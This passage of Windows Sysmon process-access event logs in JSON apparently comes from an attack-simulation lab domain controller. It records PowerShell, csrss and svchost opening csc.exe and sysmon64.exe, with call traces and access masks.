C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447DB68F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.697","SourceProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","SourceProcessId":"872","SourceThreadId":"5096","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-00101D2C0800}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447DB68F)","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5573,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.697\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-00101D2C0800}\r\nTargetProcessId: 4804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.697","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-00101D2C0800}","TargetProcessId":"4804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5574,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.697\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.697","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5575,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.697\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.697","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5576,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.697\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.697","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5577,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.697\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.697","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5578,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.697\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.697","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5579,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.697\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.697","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5580,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.697\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 